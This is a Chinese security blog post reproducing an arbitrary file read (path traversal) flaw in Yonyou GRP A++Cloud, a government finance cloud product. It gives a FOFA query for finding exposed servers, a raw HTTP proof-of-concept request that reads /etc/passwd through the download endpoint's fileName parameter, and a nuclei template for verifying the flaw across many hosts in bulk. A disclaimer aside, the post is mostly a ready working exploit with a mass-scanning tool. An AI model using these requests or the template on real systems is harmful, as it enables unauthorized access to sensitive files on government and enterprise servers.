用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现

文摘   科技   2024-05-10 10:47   陕西  

免责声明

     请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。



01
0x01漏洞描述


用云GRP A++Cloud是一款高性能的云端企业资源规划(ERP)软件,通过整合各种业务流程和部门数据,为企业提供全面的管理和决策支持。它采用了先进的云计算技术,具有卓越的稳定性、可靠性和安全性,能够帮助企业实现数字化转型和业务优化。

用友GRP A++Cloud 政府财务云 任意文件读取漏洞,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。


02
0x02 漏洞复现 
fofa语法:body="/pf/portal/login/css/fonts/style.css"

POC:GET /ma/emp/maEmp/download?fileName=../../../etc/passwd  HTTP/1.1Host: x.x.x.xCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMTConnection: close

03
0x03 nuclei批量验证脚本
 id: yongyou_grpa_cloud_fileread
info: name: yongyou_grpa_cloud_fileread author: recjl severity: medium description: description metadata: max-request: 1 verified: true fofa-query: body="/pf/portal/login/css/fonts/style.css" tags: fileread,yongyou,hw
requests: - raw: - |+ GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1 Host: {{Hostname}} Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=D32BAA39CE141CA6077FF7FF12F03B1C If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT Connection: close

matchers-condition: and matchers: - type: word part: body words: - root:x:0:0:root:/root:/bin/bash - type: status status: - 200   



END
点击蓝字  关注我们

爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章